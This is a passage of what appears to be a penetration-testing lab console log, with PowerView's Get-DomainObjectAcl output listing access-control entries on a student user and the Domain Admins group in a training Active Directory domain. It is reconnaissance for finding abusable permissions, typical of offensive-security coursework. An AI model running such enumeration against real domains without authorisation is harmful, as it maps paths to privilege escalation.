ObjectAceType : Email-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName :

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Account Operators

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadControl
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131072
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Authenticated Users

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : Local System

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-527
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-526
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-3-0
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Creator Owner

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : Enterprise Domain Controllers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit, ObjectInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ObjectInherit, ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName :

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ListChildren
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 4
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Pre-Windows 2000 Compatible Access

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
IdentityName : BUILTIN\Administrators

Getting the ACLs associated with the specified prefix

PS C:\Users\student163> Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=krbtgt))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-
DC.DOLLARCORP.MONEYCORP.LOCAL/DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(samAccountType=805306368)(|(samAccountName=krbtgt)))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Schema,CN=Configuration,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (schemaIDGUID=*)
VERBOSE: [Get-DomainGUIDMap] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Extended-
Rights,CN=Configuration,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (objectClass=controlAccessRight)
VERBOSE: [Get-DomainGUIDMap] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObjectAcl] Get-DomainObjectAcl filter string:
VERBOSE: [Get-DomainSearcher] search base: LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (objectClass=*)

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
